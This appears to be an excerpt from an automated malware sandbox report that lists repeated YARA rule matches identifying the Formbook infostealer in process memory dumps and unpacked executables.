 Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources